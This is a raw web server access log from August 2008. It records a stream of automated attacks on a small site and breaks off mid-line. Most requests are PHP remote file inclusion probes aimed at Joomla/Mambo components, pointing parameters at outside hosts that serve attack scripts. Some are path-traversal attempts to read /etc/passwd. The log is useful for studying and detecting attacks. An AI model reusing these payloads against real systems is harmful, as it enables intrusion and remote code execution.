87.118.112.54 - - [24/Aug/2008:10:55:49 -0700] "GET ///index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 200 10009 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.112.54 - - [24/Aug/2008:10:55:50 -0700] "GET /logs///index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:10:56:18 -0700] "GET /logs/access_080229.log/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:56:21 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:56:41 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.235.247.169 - - [24/Aug/2008:10:56:55 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.235.247.169 - - [24/Aug/2008:10:56:55 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:57:05 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:57:16 -0700] "GET /logs/access_080723.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.167.120.102 - - [24/Aug/2008:10:57:37 -0700] "GET /components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.167.120.102 - - [24/Aug/2008:10:57:45 -0700] "GET /components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:57:49 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:57:49 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.118.112.54 - - [24/Aug/2008:10:58:10 -0700] "GET /logs/access_080723.log///index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:13 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:14 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:21 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:21 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.79.100 - - [24/Aug/2008:10:58:24 -0700] "GET /logs/default.php?page=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
201.17.129.24 - - [24/Aug/2008:10:58:26 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [24/Aug/2008:10:58:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:58:28 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:58:28 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.58.79.100 - - [24/Aug/2008:10:58:28 -0700] "GET /default.php?page=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
201.17.129.24 - - [24/Aug/2008:10:58:28 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:58:31 -0700] "GET /logs/access_080808.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:58:33 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:34 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:34 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:58:35 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:58:37 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:58:49 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:58:49 -0700] "GET /lostpasswd.php?env[include_prefix]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:57 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:58:57 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:59:05 -0700] "GET /logs/access_080725.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:59:05 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:59:05 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.88.192.8 - - [24/Aug/2008:10:59:05 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:59:06 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.88.192.8 - - [24/Aug/2008:10:59:06 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:59:06 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:59:13 -0700] "GET /logs/access_080621.log///vwar/backup/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.174.80.173 - - [24/Aug/2008:10:59:18 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.173 - - [24/Aug/2008:10:59:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.173 - - [24/Aug/2008:10:59:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:59:23 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.80.173 - - [24/Aug/2008:10:59:23 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:59:23 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:59:24 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:59:24 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:59:36 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:59:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:59:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:59:39 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:59:40 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.235.247.169 - - [24/Aug/2008:11:00:13 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.235.247.169 - - [24/Aug/2008:11:00:14 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.57.255.65 - - [24/Aug/2008:11:00:14 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.57.255.65 - - [24/Aug/2008:11:00:14 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.57.255.65 - - [24/Aug/2008:11:00:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:11:00:15 -0700] "GET /logs//?prefix=http://spiritualcultivation.com/modules/idid.txt?? HTTP/1.1" 200 62004 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:11:00:16 -0700] "GET //?prefix=http://spiritualcultivation.com/modules/idid.txt?? HTTP/1.1" 200 9885 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:11:00:20 -0700] "GET /logs/oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:11:00:20 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:11:00:21 -0700] "GET /logs/access_080725.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:11:00:21 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:11:00:21 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:11:00:52 -0700] "GET /index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:11:00:52 -0700] "GET /logs/access_080519.log/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:11:00:52 -0700] "GET /logs/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:11:00:52 -0700] "GET /logs/access_080811.log/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:11:01:06 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:11:01:31 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:11:01:31 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.166.106 - - [24/Aug/2008:11:01:33 -0700] "GET /logs/access_080209.log/?basepath=http://www.bdc4u.com/logo/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.166.106 - - [24/Aug/2008:11:01:34 -0700] "GET /?basepath=http://www.bdc4u.com/logo/bo.do??? HTTP/1.1" 200 9873 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:11:01:51 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:11:01:51 -0700] "GET /logs/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 61999 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:11:01:51 -0700] "GET /?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 9909 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:11:01:51 -0700] "GET /logs/access_080209.log/?basepath=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:11:01:51 -0700] "GET /logs/?basepath=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 61999 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:11:01:52 -0700] "GET /?basepath=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 9883 "-" "libwww-perl/5.810" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:11:01:53 -0700] "GET /logs/access_080615.log/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:11:01:55 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:11:01:59 -0700] "GET /logs/access_080508.log/?basepath=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:11:02:01 -0700] "GET /logs/access_080715.log/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:11:02:03 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:11:02:03 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:11:02:49 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.180.241.37 - - [24/Aug/2008:11:02:58 -0700] "GET /logs/access_080803.log/main.php?page=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [24/Aug/2008:11:02:58 -0700] "GET /main.php?page=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [24/Aug/2008:11:02:59 -0700] "GET /logs/main.php?page=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:11:03:09 -0700] "GET /logs/access_080803.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:11:03:09 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:11:03:13 -0700] "GET /logs/access_080803.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:11:03:13 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:11:03:13 -0700] "GET /logs/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 61999 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:11:03:13 -0700] "GET /?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 9909 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.17.129.24 - - [24/Aug/2008:11:03:26 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:11:03:29 -0700] "GET /logs/access_080620.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.80.173 - - [24/Aug/2008:11:03:31 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:11:03:51 -0700] "GET /logs/access_080803.log/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:11:03:51 -0700] "GET /logs/?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 61999 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:11:03:52 -0700] "GET /?sourcedir=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 9909 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:11:04:08 -0700] "GET /myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [24/Aug